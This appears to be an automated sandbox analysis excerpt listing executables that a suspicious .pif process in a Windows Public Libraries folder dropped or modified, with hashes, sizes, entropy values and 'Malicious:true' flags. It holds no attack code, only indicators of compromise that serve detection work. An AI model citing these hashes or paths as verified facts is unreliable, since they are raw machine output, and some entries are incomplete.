                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032923839432674
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:Fy5dXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:g3sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EFF29C547B82476ACDE5212C394C4AE5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F4D6F651AD4329162E5597BA8B426AAF13A76BDC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2BEF18D3B2B3BB8E093EDCAB83563BA5DCD8C7ED604E996286672693915D5F4A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9F428101612F94ECE64F819EEDB41688B00C849924DDF50189C6B87BD64195987D7EE34FD688CC0F8189A0B683C1C7F8A5D60DD0B3528A3B6276FC7E3A052DCE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032997212689758
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:wKlVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:l7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:63DB5326B4AE3FC288F3D33D08CDE017
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:04135A0E4E614659F03D17707BBCDB5ABA242373
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C58B362049CD2FDC515A1630D4DB67DC08C764D59A653F858DDC87BC2511C691
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C2DEC3D9FC74002742A236FDF4B4449250E9352371C9291CBBB9900B5D5A78F6CDD706A47339663ABE09C2CAA00F1A6E7725680B3212958BC9EBBD5BBE01212E
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032998484090307
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:GilVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:v7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:92C532B7D4BBD38F3015EF968462D160
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8B823788B63013089814DDCB3A44339941E08AFE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5932DA35151E821BB6981924FB2964239F3D5DAC18E0D513A6174E488599BDA7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DB8F566441830CDFB25D51F5DD60C381197B66BF73E280B08B09F50651E0D35775EB5F7D9166B0FC2DC9F9E86E54F990A49986ED92C5DAF2BA1427D708268932
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032972322082015
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:2Tm1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:93206A9817BD4D5BDBC795F0FACD3AAA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:52E5095BF44A63386E5C75C82D4CCF53A5896B94
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FBFB572D9ABE7674FED31EEF2E48960C30E5714E798AEC1AA25747CFC669B0DD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B4AAB4177FDE536C9919DFC7094963BA2B68B6B9F6EB013025EF4062C2F3B8547F64DF365233BBDE1712C54DF4086A58E37AF53F6A4A3E4402BD4F7B08F97A7F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0338837725707215
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032953073004555
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032986680875905
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032870777136916
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032923487801805
Encrypted:false
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032985304598125
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:/5/fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:hnsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1B875B4754D23EA90A3163FA9DEAAC0C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8444F7D6ABD1EC2C83B0B6BA018B5647C05AE6FF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:793E0B236D7F0F16CFC84B331B2C4D6B56A6035137AEEAF26D707081F4AC34C3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:62E5661780346413BE7541728FF3FED86D5817C07DE03AA0D673EACBC9D90325ECC0C2682F6428AAB69BA5FCDA623EAE6459617A9BE0A2B74873780E01E514AC
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1206784
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0843040995084525
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:mcpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:mcpsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:998746B1B7904346A8174FEF4B911F22
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:84872AE74FE6186EA4223399754A43744261DE7B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:54D41C807A7366BA98340AE13E7F49F89387B14CE9B778E0C4D9CE687F95EBB3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BA3797153E49CE5C148354F1F0257A1A8D0393C19FAEEDD1B75C5B9AA6A709A4D24A0BD5589F91765B8E05A9AD0A2884AF0E0928D2C316E954FB162A1A0DFAC0
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142784
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032320530190986
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:wKQzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:V8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:10DE76A417D4E0C3BE18B15F66A924BB
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9F8EABCB95A3EDD1C53C2EEF52B3F4D428F0C050
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5DCA17058DD118049D7BD27B6128D56D8F82C5B1E5241B56EFDC79B10672F59D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CEBE69D75F601D74819D13F4BE699BD243304A18DE9CE12E7EA5F477F6D5219CB2B0009DF9CCD9DBEE2380ABD4C32ECD3B63506C67803919D520EB697D8DCDDD
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1303040
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.236138324097892
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:fi7lP3roAVsqjnhMgeiCl7G0nehbGZpbD:ClvroAJDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:56D85FCA3A13BCC4F5D54A0D7FDF6FD3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B906D45DA73056FA97B7D1EE82276A898E76C4DF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F947D1E64C5B17F1A131577B360957B8B6BD1ED5D02F0ED6467E1454B9F0149
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:94DEF4C1B5EB2AA074607EBA21FC0627B0BEC1C7BEE5A85DFFE562FDC7D3FC54BBE6B5654504A4853491DFCF904E7E81D494A90B074FE4C6A05B929811222372
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1273344
Entropy (8bit):5.2735040065872445
Encrypted:false
SSDEEP:12288:P5bfQXxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PNfQXxsqjnhMgeiCl7G0nehbGZpbD
MD5:53461E698EBB3C9415264F3BCC7EDA2F
SHA1:29290DA3B6993DBF8A1F504922F712E604C1F279
SHA-256:A99BC5A9F9C1C3D2B7D0E3DED7145FE644FA0A9F5A11A9E2C4705F93C8B16014
SHA-512:1B31B2BA659553C40F9CA4DA8A8C1A425E44E4286B8DA2485162D97315EA124A352BAB9E3A2AD9313F92F4C25DAD5319F4156ED13C76BD0570FBF41746B46317
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1291776
Entropy (8bit):5.290140755736029
Encrypted:false
SSDEEP:12288:lNmt0LDILi2liXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:wLi9sqjnhMgeiCl7G0nehbGZpbD
MD5:F650CE9C51B5B94DAF4B2088B79A8D86
SHA1:3FC91982B084F0E6093B64834DEA13138CE5CA20
SHA-256:09B73E33F1BD8570EBCBBAC326E0ADCAF2100B18D6102EE97C2C1526FA2ED086
SHA-512:FAD9B69534B8629A04C9560CFF2F13D755EA33C886466713ADD6090855F7BD52F9E1602C38A1A631DBAB7C68DF43E3EF0D11C3073272D56D890FB84DD649B054
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1291776
Entropy (8bit):5.290140171080609
Encrypted:false
SSDEEP:12288:ZNmt0LDILi2liXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:8Li9sqjnhMgeiCl7G0nehbGZpbD
MD5:9DFCEB63BD567986BCD366E3DF6507CB
SHA1:E3C42180CAF3C80C83D1DF9B3597CF13A33F37D9
SHA-256:C2860FCE87657BF782F122CBB218C0216AE54790DB66A4D2A6899B90CA7FBF48
SHA-512:EF2AA355E4B9DE9656F51B39D6FF3989D417328ED05A95CB8EDDCB18778941BF2453A754BA7C16958B45DC104160AA9A24ADA083394C50E447D0BA7C84DDA976
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1343488
Entropy (8bit):5.236038349195191
Encrypted:false
SSDEEP:12288:jjuozQMGNUbTpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:PfNsqjnhMgeiCl7G0nehbGZpbD
MD5:FC9BBB8F1989D9CB3BFECFF2117B1A62
SHA1:70FDF6555379559CA0598C6E5D614443EEE71C1F
SHA-256:BA0AA0CBE2CB81014BEB31D051E6F7C51676E6537BAC0281F95AA98611B65745
SHA-512:20B444A95E5D7B6F058C5AA67026E5FAC51DDD90B8C688880DAA009B1E593F040721075C4C55929250CE9B67330E22918A437053C3577BACD865C328B2C71379
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):1500160
Entropy (8bit):5.5661984747109505
Encrypted:false
SSDEEP:24576:UbUO42y/EAsqjnhMgeiCl7G0nehbGZpbD:UZ8Dmg27RnWGj
MD5:202977845D043642CC3B3B5A74DC5B26
SHA1:BA92DA5B4B19E18EBD3BF08FD083D1452CEE9326
SHA-256:D431219E13EFB80217D3F5A97CDF7C336C24DBD269CAA4A9E6CC4DD9DA5BB820
SHA-512:97D229C0ABAD72D90003585C631F7BE39491A11CFB6B518CFC26D0F68CC02004ED570D924D34815CC28DE9861426819C65C0F0ECB64C817F532E1C9E6CC5A0C3
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):52712960
Entropy (8bit):7.961838907566781
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1661440
Entropy (8bit):5.624523443283969
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4364800
Entropy (8bit):6.748483048025042
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1242624
Entropy (8bit):5.133485545520552
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2354176
Entropy (8bit):7.050007649971273
Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:ahDdVrQ95RW0YEHyWQXE/09Val0GMDmg27RnWGj:ahHYW+HyWKTD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:BE02F61FAC56C7D6563B746AF0B6AB07
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F8C659579A2007DAAC92ED51B25DCB42E456E9FD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F58DEE5B5D1F53D11EFFB9DDF45D0DE6A9913C3AD0617A5AB7A2A4E7D9115B25
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C439FADF905036FAB4D54A7DAD1BD2C5440739A10F0BC062AACFE62EBAACD7314CD66BCFA51A7D1C6D1E3167456B8908ECCA6416DF901319527B7BDE151AD02C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.158494396557871
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:B70E0ZCQZMiU6Rrt9RoctGfmddwsqjnhMgeiCl7G0nehbGZpbD:F0EzQSyRPRoc1YDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:67103446BCBE19BCCEC4C9A0BA5E78B6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D2E78C3781919464061860E4AFFFB9BCB1B1ABD3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BBF65C780F91CF2233B91B64A55DD35A630DE7D9B2BB0841B03959916781265D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:801A52858FC717264BD8E5152C82BBCAA70EDCA3E6BAD21EA0B1EC915725CE3DC79E6FFD6732EC84599C42798F9D9B3581C725276E4290B0FB17D1709A981BDD
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.14548547149981
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:JiD2VmA1YXwHwlklb8boUuWPg2gvsqjnhMgeiCl7G0nehbGZpbD:ID2VmAyiwIb8boQ8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:7E27CE285E56A3F2D8391082526D2962
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E42F8238E13A47973C9B1E1BCF835C9FA479C5C4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6A046EDAE5F0583263587F5AD9F73E6E8C8DE6E9C3A07751940A05800B50C197
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3B77720D74F75AB441870B2AAA1847537B3CFF4F24E84DEE5606C515A947FF39FEEC9B3D8FC4B6BB364537E7ABEE74A46BDAB10199486938116A8A039DB4B218
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.950742092750016
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:EfD3zO9ZhBGloizM3HRNr00EDmg27RnWGj:eDaalxzM00ED527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:A7296EB08758E5F96335C58645B2D754
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E4693068D3F03907E81433D1C51AEC309BCCA84A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2B1DE7E3047319F48840CA88C41DCFC3AC4BBF59DF6D12495E8D2A0C58AF0FA0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:215C10C83688230CD480FA8B8A5259694213FF1E8406A638C4CE362736E834A252F518E7E4EE3DDFD7DEC19C3933EE7390F12D713A150898029A9B1BD61BE4B3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.824618096052798
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:KTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPh3Dmg27RnN:FI72LvkrDpbxJRoIMsD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B8E2363A7CDA7E2452E6F10B24FBFBCF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CF19A6AB960A28994B7B829258416EB57C43663A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0E0E0D6472F814D7028C56BDDE54045F325F1B71160868F578E282DBA88D0CEC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:36BD65F560B12697AC830C9E0049754BE7D3514C8560473D5B2196A02226112FEA5DDB515732713A9BF1A4D1A3BC323739BC1064632231CFB8BE3E0500621EF4
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.09724479787688
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:RW9Jml9mmijviMnF+ZxmQWcbLw8VgsqjnhMgeiCl7G0nehbGZpbD:RWnm5iOMkjmQWkVcDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2C92DF9E3081B78857565509221402D3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:762F43FF3974E958A11792DF044E395B1E146764
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8CCA7B84527F602ED4C5905135B835D254BF0FA374639BDC4FD469E0AA0FA55C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8E5388D64A87D7AD1A0C60C45D10BEB8164468AD637DEA93CE092485EFF89B44044CB53FD6E0EE7206E3064D2B2DC24270EA9592269FE9C6C91F8A4A88E3CF02
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.166369270361556
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:OwNHwoYhua6MtjRO4qbBJTY6mY1uIgWsqjnhMgeiCl7G0nehbGZpbD:OwNPdQO7BJTfmEtDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:5E825D4944EA5D984F16E53442A8E1EA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:81EA0592A798D33CBFAB0DAB006141520B66812C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDFC801A1693F51013E556AE53C9048BB8EC54922C23C53E4500647C7699A45C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5A7F475153DE3E28F0484A4F50255279B11317A01CE5BC358D19932A5F9722911D68AF949731B0136F0A2B00F31EB0D138525F987D6A998F0D09CF9E489EFE19
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.145479687611655
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:jiD2VmA1YXwHwlklb8boUuWPg2gvsqjnhMgeiCl7G0nehbGZpbD:eD2VmAyiwIb8boQ8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:271F0F10E5A9428988106D16D267E2E7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:50115D29D0DC8ADD1B7D54BBCE59B269C800E351
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4A44D6AC356F3237F6BA92B68AB59593BF676E6598B5A0BD3CA4C5637627E57C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C20BEA932CB3D1B4895B0BBDFEA70A2549FA7FF54DF948782F2FD8D2BF9DA1566CE1D99CA96CC8B12A9ACA07816C2FE7EBD3A485575451BCF34CB3D4C2EBF7E9
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
